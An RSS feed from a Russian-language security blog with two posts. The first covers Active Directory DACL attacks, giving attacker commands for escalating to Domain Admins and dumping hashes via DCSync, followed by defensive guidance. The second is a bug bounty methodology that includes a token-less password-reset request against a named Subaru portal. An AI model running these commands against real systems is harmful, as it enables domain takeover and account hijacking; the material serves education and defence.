<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>Dp2 (онлайн👨‍💻)</title><generator>teletype.in</generator><description><![CDATA[Dp2 (онлайн👨‍💻)]]></description><image><url>https://img4.teletype.in/files/bf/c8/bfc82ae6-3e80-4062-8b2c-da11792ebc95.png</url><title>Dp2 (онлайн👨‍💻)</title><link>https://teletype.in/@dp4chat</link></image><link>https://teletype.in/@dp4chat?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=dp4chat</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/dp4chat?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/dp4chat?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sun, 11 Oct 2026 04:32:07 GMT</pubDate><lastBuildDate>Sun, 11 Oct 2026 04:32:07 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@dp4chat/CnaFjIed51n</guid><link>https://teletype.in/@dp4chat/CnaFjIed51n?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=dp4chat</link><comments>https://teletype.in/@dp4chat/CnaFjIed51n?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=dp4chat#comments</comments><dc:creator>dp4chat</dc:creator><title>DACL-атаки в Active Directory - комплексный анализ методов атаки и защиты</title><pubDate>Sat, 15 Mar 2025 21:28:19 GMT</pubDate><description><![CDATA[<img src="https://img4.teletype.in/files/f7/f5/f7f51821-35c9-42cf-bb18-00b542af8576.jpeg"></img>DACL (Discretionary Access Control List) атаки представляют собой серьезную угрозу для безопасности Active Directory (AD). Эти атаки позволяют злоумышленникам использовать неправильно настроенные списки контроля доступа для повышения привилегий и получения несанкционированного доступа к критическим ресурсам сети.😳]]></description><content:encoded><![CDATA[
  <p id="NFP3"><strong>DACL (Discretionary Access Control List) </strong>атаки представляют собой серьезную угрозу для безопасности Active Directory (AD). Эти атаки позволяют злоумышленникам использовать <u>неправильно настроенные списки контроля доступа для повышения привилегий и получения несанкционированного доступа к критическим ресурсам сети</u>.😳</p>
  <p id="AGQe"><strong>1. Основы DACL в Active Directory</strong></p>
  <p id="XISa">1.1 Что такое <strong>DACL </strong>(Discretionary Access Control List) - <strong>это список, определяющий, какие субъекты безопасности (пользователи, группы) имеют доступ к объекту и какие действия они могут выполнять</strong>. <strong>DACL состоит из ACE (Access Control Entries)</strong>, каждая из которых определяет права доступа для конкретного субъекта. <br />1.2 Роль DACL в безопасности AD DACL играют ключевую роль в обеспечении безопасности AD, контролируя доступ к объектам, таким как пользователи, группы, компьютеры и другие ресурсы. <strong>Неправильно настроенные DACL могут привести к серьезным нарушениям безопасности</strong>.<br />1.3 Типы ACE<br /></p>
  <p id="cY18">ACE (Access Control Entries) - это отдельные записи в DACL, определяющие права доступа. Основные типы ACE включают:</p>
  <ul id="XHsh">
    <li id="zQ9W">ACCESS_ALLOWED_ACE: Предоставляет разрешение на определенные действия.</li>
    <li id="Pv4x">ACCESS_DENIED_ACE: Явно запрещает определенные действия.</li>
    <li id="heRE">SYSTEM_AUDIT_ACE: Определяет, какие действия должны быть зарегистрированы в журнале аудита безопасности.</li>
    <li id="PxeF">ACCESS_ALLOWED_OBJECT_ACE: Специфичный для AD тип, позволяющий более детально контролировать доступ к свойствам объектов.</li>
  </ul>
  <p id="tkHO">&quot;Объектно-специфичные ACE используются только в Active Directory. В дополнение к членам структуры обычных ACE, объектно-специфичные ACE содержат дополнительные поля, такие как ObjectType (GUID, содержащий тип дочернего объекта, набор свойств или свойство, расширенное право или проверенную запись) и InheritedObjectType (указывает тип дочернего объекта, который может наследовать ACE).&quot;</p>
  <p id="bJFq"><br />2. Практический гайд для атакующего</p>
  <p id="rMli">2.1 Инструменты для обнаружения и эксплуатации DACL-уязвимостей:</p>
  <p id="krjQ"><strong>BloodHound</strong>: Визуализация и анализ путей атак в AD<br /><strong>PowerView</strong>: Мощный инструмент для перечисления AD<br /><strong>ADACLScanner</strong>: Сканирование и анализ DACL объектов AD<br /><strong>Adalanche</strong>: Построение графов атак на основе DACL<br />StandIn: Инструмент для эксплуатации DACL-уязвимостей<br /><strong>Impacket</strong>: Набор инструментов для работы с сетевыми протоколами<br />PowerSploit: Фреймворк для пост-эксплуатации Windows<br />SharpHound: Сборщик данных для BloodHound <br />dacledit.py: Инструмент для анализа и модификации DACL</p>
  <p id="BIor">a) Перечисление DACL:</p>
  <ul id="YLs9">
    <li id="0fA8">Использование PowerView для получения ACL объектов:</li>
  </ul>
  <p id="vToE"><code>Get-DomainObjectAcl -Identity &quot;CN=Administrator,CN=Users,DC=domain,DC=com&quot; -ResolveGUIDs</code></p>
  <ul id="mjnl">
    <li id="6U7E">Применение ADACLScanner для массового сканирования DACL:</li>
  </ul>
  <p id="jYC8"><code>.\ADACLScan.ps1 -Base &quot;DC=domain,DC=com&quot; -Output CSV -Filename &quot;acl_scan_results.csv&quot;</code></p>
  <ul id="tuDZ">
    <li id="IrTW">Использование dacledit.py для анализа DACL конкретных объектов:</li>
  </ul>
  <p id="dAzJ"><code>python3 dacledit.py -principal user -target &quot;CN=Administrators,CN=Builtin,DC=domain,DC=com&quot; -dc-ip 10.10.10.10 domain.com/user:password</code></p>
  <p id="CnQ0">2.2 <strong>Техники атаки:</strong><br />a) Перечисление DACL:<br />Использование PowerView для получения ACL объектов<br />Применение ADACLScanner для массового сканирования DACL<br />Использование dacledit.py для анализа DACL конкретных объектов<br />b) <strong>Анализ путей атак:<br /></strong>Загрузка данных в BloodHound<br />Использование Adalanche для построения графов атак<br />Анализ выходных данных dacledit.py для выявления уязвимостей<br /><strong>c) Эксплуатация уязвимостей (Неправильно настроенные DACL):</strong></p>
  <ul id="cPMY">
    <li id="6v7t">WriteDACL: Позволяет изменять DACL целевого объекта, что может быть использовано для предоставления дополнительных прав.</li>
    <li id="mZmr">WriteOwner: Дает возможность изменить владельца объекта, что часто позволяет получить полный контроль над объектом.</li>
    <li id="Ys00">GenericAll: Предоставляет полный контроль над объектом, включая возможность изменения его атрибутов и DACL.</li>
    <li id="2YN0">WriteProperty: Позволяет изменять определенные атрибуты объекта, что может быть использовано, например, для изменения членства в группах.</li>
    <li id="7hXu">ForceChangePassword: Дает возможность принудительно изменить пароль пользователя без знания текущего пароля.</li>
    <li id="97li">AddMembers: Позволяет добавлять пользователей в группы, что может быть использовано для повышения привилегий.</li>
  </ul>
  <p id="y7WL"><br />d) <strong>Повышение привилегий</strong>:</p>
  <ul id="wyP9">
    <li id="U5ET">Добавление пользователя в привилегированную группу (например, &quot;Domain Admins&quot;) с использованием прав GenericAll или WriteProperty.</li>
    <li id="do5l">Сброс пароля целевой учетной записи с высокими привилегиями с помощью права ForceChangePassword.</li>
    <li id="CS4g">Использование делегирования Kerberos для получения доступа к ресурсам от имени привилегированного пользователя.</li>
    <li id="HtdQ">Применение техники Shadow Credentials для получения доступа к учетным записям путем манипуляции с атрибутом msDS-KeyCredentialLink.</li>
  </ul>
  <p id="3fjJ"><br />2.3 <strong>Пример атаки в полевых условиях</strong>:</p>
  <p id="xUWc">Первичный доступ: Получение учетных данных рядового пользователя<br />Перечисление: Использование PowerView и BloodHound для анализа DACL</p>
  <p id="DYDd"><code>Import-Module .\PowerView.ps1 Get-DomainObjectAcl -Identity &quot;Domain Admins&quot; -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match &quot;GenericAll|WriteDacl|WriteOwner&quot;}</code></p>
  <p id="ODDQ"><br />Обнаружение уязвимости: Нахождение объекта с WriteDACL для группы &quot;Domain Admins&quot;<br />Эксплуатация: Изменение DACL для добавления контроля над группой</p>
  <p id="UtvV"><code>python3 dacledit.py -action write -principal attacker -target &quot;CN=Domain Admins,CN=Users,DC=domain,DC=com&quot; -rights FullControl -dc-ip 10.10.10.10 domain.com/compromised_user:password</code></p>
  <p id="xuFG"><br />Повышение привилегий: Добавление своей учетной записи в группу &quot;Domain Admins&quot;</p>
  <p id="L1HP"><code>Add-DomainGroupMember -Identity &#x27;Domain Admins&#x27; -Members &#x27;attacker&#x27; -Verbose</code><br />Использование привилегий Domain Admin для полного контроля над AD, например, выполнение DCSync атаки:</p>
  <p id="vRoU"><code>secretsdump.py domain.com/attacker:<a href="mailto:password@10.10.10.10" target="_blank">password@10.10.10.10</a> -just-dc-ntlm</code></p>
  <p id="OSR2">3. <strong>Гайд для Blue Team</strong></p>
  <p id="ziem">3.1 Инструменты для обнаружения и предотвращения DACL-атак:</p>
  <ul id="CbKb">
    <li id="TnqT">Microsoft Advanced Threat Analytics (ATA): Анализирует поведение пользователей и сущностей для выявления подозрительной активности.</li>
    <li id="aQgg">Varonis DatAdvantage: Предоставляет детальную визуализацию и аудит прав доступа в AD.</li>
    <li id="KpvU">Tenable.ad: Специализированное решение для непрерывного мониторинга безопасности AD.</li>
    <li id="zbob">PingCastle: Инструмент для оценки уровня безопасности AD, включая анализ DACL.</li>
    <li id="xgpC">Purple Knight: Бесплатный инструмент для аудита безопасности AD.</li>
    <li id="2NTp">Active Directory ACL Scanner: Позволяет сканировать и анализировать DACL в AD.</li>
    <li id="vhgf">Microsoft Defender for Identity: Использует сигналы AD для обнаружения продвинутых угроз.</li>
    <li id="gxIQ">Splunk для мониторинга событий AD: Позволяет собирать и анализировать логи событий AD для выявления аномалий.<br />3.2 Техники защиты:</li>
  </ul>
  <p id="BBLt">a) <strong>Аудит и мониторинг:<br /></strong><u>Регулярное сканирование DACL с помощью ADACLScanner<br />Настройка аудита изменений DACL в групповых политиках<br />Мониторинг подозрительных изменений DACL с помощью SIEM</u><br /><u>Отслеживание событий ID 5136 и 4662 для обнаружения изменений DACL<br /></u>b) <strong>Ограничение прав:<br /></strong>Применение принципа наименьших привилегий<br /><u>Использование Protected Users group для критических учетных записей<br /></u>Ограничение делегирования Kerberos<br />Минимизация использования учетных записей с высокими привилегиями<br />c) <strong>Hardening AD:<br /></strong>Регулярное обновление систем и приложений<br /><strong>Применение рекомендаций Microsoft по безопасности AD<br /></strong>Использование LAPS для управления локальными админ паролями<br />Внедрение многофакторной аутентификации<br />Сегментация сети и изоляция критических систем<br />d) Реагирование на инциденты:<br />Разработка плана реагирования на DACL-атаки<br />Подготовка скриптов для быстрого восстановления корректных DACL<br />Тренировки по обнаружению и нейтрализации DACL-атак<br />Создание процедур для быстрого отзыва скомпрометированных учетных данных</p>
  <p id="N1ki"><strong>Заключение</strong><br />DACL-атаки представляют собой серьезную угрозу для безопасности Active Directory. Атакующие могут использовать различные инструменты и техники для эксплуатации уязвимостей в конфигурации DACL, что потенциально может привести к полному захвату домена. Blue Team должна применять комплексный подход к защите, включающий регулярный аудит, мониторинг, ограничение прав и быстрое реагирование на инциденты. Важно понимать, что безопасность AD - это непрерывный процесс, требующий постоянного внимания и адаптации к новым угрозам.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@dp4chat/gs5Q2CAGI12</guid><link>https://teletype.in/@dp4chat/gs5Q2CAGI12?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=dp4chat</link><comments>https://teletype.in/@dp4chat/gs5Q2CAGI12?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=dp4chat#comments</comments><dc:creator>dp4chat</dc:creator><title>Bug Bounty 2025: Реальный подход к поиску уязвимостей</title><pubDate>Thu, 13 Feb 2025 22:10:53 GMT</pubDate><description><![CDATA[Главный принцип: количество &gt; сложность.]]></description><content:encoded><![CDATA[
  <h2 id="YgQI">🎯 Правда о современном Bug Bounty</h2>
  <h3 id="w6fq">Эффект Santiago Lopez</h3>
  <ul id="WLFm">
    <li id="PfRh">$1M+ на HackerOne</li>
    <li id="I0PW">20-50 репортов в месяц</li>
    <li id="LeVc">В основном Low/Medium баги</li>
    <li id="G65S">$250-500 за баг</li>
    <li id="cUEJ">До $25k в месяц</li>
  </ul>
  <p id="SqOm" data-align="center">Главный принцип: количество &gt; сложность.</p>
  <p id="OxZe">🔍 Как выбрать что тестировать:<br /><br />1. Правильные цели<br /><strong>// High Priority:<br /></strong>- Enterprise SaaS (Salesforce, Atlassian)<br />- Платежные системы<br />- Админ панели <br />- OAuth/SSO<br />- File Upload функционал</p>
  <p id="4VCh"><strong>// Medium Priority:<br /></strong>- User Management<br />- Личные кабинеты<br />- Поиск/Фильтры<br />- API эндпоинты</p>
  <p id="5rOd"><strong>// Low Priority:<br /></strong>- Статические страницы <br />- Документация<br />- Marketing сайты</p>
  <h3 id="X7lL">2. &quot;Чувствуем&quot; продукт</h3>
  <ul id="VZ6E">
    <li id="sUav">Если находите маленькую ошибку в UI = копайте глубже</li>
    <li id="vHfb">Если документация не совпадает с реальностью = gold mine</li>
    <li id="tSNs">Если видите legacy код = stay here</li>
  </ul>
  <h2 id="wcBT">💡 Практическая методология</h2>
  <h3 id="jDuE">1. Тестируем с разных сторон</h3>
  <p id="9ksz"><u>ВСЕГДА используем минимум 2 аккаунта:<br /></u>account1 -&gt; делаем действие -&gt; смотрим как видит account2</p>
  <p id="OiU1"><u># Проверяем с разных ролей:<br /></u>- free vs premium<br />- user vs admin  <br />- banned vs active</p>
  <p id="6nHn"><u># Тестируем с разных клиентов:<br /></u>- Web App<br />- Mobile App<br />- Desktop Client</p>
  <p id="Lh2i"></p>
  <h3 id="O3AC">2. Фокусируемся на одной функции</h3>
  <p id="WvhF">// <strong>Пример</strong>: File Upload<br />1. До загрузки:<br />- Проверка типов файлов<br />- Валидация размера<br />- Frontend проверки</p>
  <p id="IKNI">2. Во время загрузки:<br />- Путь сохранения<br />- Обработка имени<br />- Metadata</p>
  <p id="r5E2">3. После загрузки:<br />- Права доступа <br />- Превью<br />- Sharing функционал</p>
  <h3 id="vKMr">3. Проверяем новые фичи</h3>
  <p id="IHQD">// Признаки нового функционала:<br />&quot;beta&quot;<br />&quot;new&quot;<br />&quot;coming soon&quot; <br />&quot;preview&quot;</p>
  <p id="IwMT">// Почему это важно:<br />- Меньше тестировщиков<br />- Быстрая разработка<br />- Меньше проверок<br />- Часто без валидации</p>
  <h2 id="FUt3">🛠 Техники тестирования</h2>
  <h3 id="n1ZZ">1. &quot;Спящий баг&quot;</h3>
  <p id="V8kN">// Ищем параметры типа:<br />{<br />  &quot;debug&quot;: false,<br />  &quot;beta&quot;: false,<br />  &quot;admin&quot;: false<br />}</p>
  <p id="gkSZ">// Пробуем:<br />- Менять на true<br />- Добавлять новые флаги<br />- Следить за поведением</p>
  <h3 id="yKQm">2. Permission Testing</h3>
  <p id="dLF6"># 1. Читаем документацию:<br />&quot;Нужны права admin для X&quot;</p>
  <p id="py80"># 2. Тестируем как user:<br />Если работает = баг на $500</p>
  <p id="shoV"># 3. Проверяем похожий функционал:<br />/api/v1/admin/action1<br />/api/v1/admin/action2<br />/api/v1/admin/action3</p>
  <h3 id="MUNp">3. Mobile API Abuse</h3>
  <p id="olvc">// Мобильное API часто:<br />- Имеет другой бэкенд<br />- Меньше проверок<br />- Больше параметров<br />- Legacy эндпоинты</p>
  <p id="974Z">// Ищем:<br />- Разные endpoint URLs<br />- Дополнительные параметры<br />- Отсутствие валидации</p>
  <p id="MXMi"></p>
  <h2 id="qfEj">🎯 Реальный пример: </h2>
  <p id="vhUv">Как это работает на практике:</p>
  <p id="0jOR">1) Исследователи нашли админку:</p>
  <pre id="q63c">codeportal.prod.subarucs.com/login.html</pre>
  <p id="ejJw">2) Вместо сложного тестирования - просто смотрим JS:</p>
  <pre id="KAhB"> code$.ajax({
    url: &quot;/forgotPassword/resetPassword.json&quot;,
     {
        email: email,
        password: $(&#x27;#new_password&#x27;).val()
    }
})</pre>
  <p id="8q1l">3) Заметили отсутствие валидации токена:</p>
  <pre id="V2YL">POST /forgotPassword/resetPassword.json
{
  &quot;email&quot;: &quot;employee@subaru.com&quot;, 
  &quot;password&quot;: &quot;new&quot;
}</pre>
  <p id="B4Vw">Результат = $</p>
  <h2 id="qV7G">💎 Главные принципы успеха</h2>
  <ol id="50mr">
    <li id="Xv3a"><strong>Регулярность &gt; Сложность</strong></li>
  </ol>
  <ul id="ySad">
    <li id="WfRy">2-3 часа каждый день</li>
    <li id="yrTD">Один функционал за раз</li>
    <li id="5iDM">Документируем всё</li>
  </ul>
  <ol id="AVUV">
    <li id="c3GU"><strong>Фокус на low hanging fruits</strong></li>
  </ol>
  <ul id="bL2z">
    <li id="AgNF">Permission issues</li>
    <li id="dt8c">XSS через обход фильтров</li>
    <li id="dFPh">Простые IDOR</li>
    <li id="RGkf">Basic file upload issues</li>
  </ul>
  <ol id="Xxhj">
    <li id="yLUe"><strong>Правильный выбор целей</strong></li>
  </ol>
  <ul id="gYCy">
    <li id="5PFo">Enterprise системы</li>
    <li id="VIqM">Новый функционал</li>
    <li id="fAqO">Сложные интеграции</li>
    <li id="NSX6">User management</li>
  </ul>
  <h2 id="FHJC">🎬 Важные советы</h2>
  <ol id="sOnd">
    <li id="qQoB">Делаем перерывы:</li>
  </ol>
  <pre id="LvHv"> 2 часа тестирования
- 30 минут перерыв
- Смена функционала каждый день</pre>
  <ol id="clor">
    <li id="BtSe">Ведем статистику:</li>
  </ol>
  <pre id="mIzI">- Какие типы багов находятся чаще
- Где самый высокий ROI
- Сколько времени на каждый функционал</pre>
  <ol id="H1Y9">
    <li id="G1Ky">Не усложняем:</li>
  </ol>
  <pre id="O9xU">- Минимум автоматизации
- Простые инструменты
- Фокус на одной цели</pre>
  <p id="rJRp">Помните: Santiago Lopez стал миллионером не находя RCE, а методично тестируя простые вещи каждый день.</p>
  <p id="xYgH"><code>Всем спасибо :D<br /><br /></code></p>

]]></content:encoded></item></channel></rss>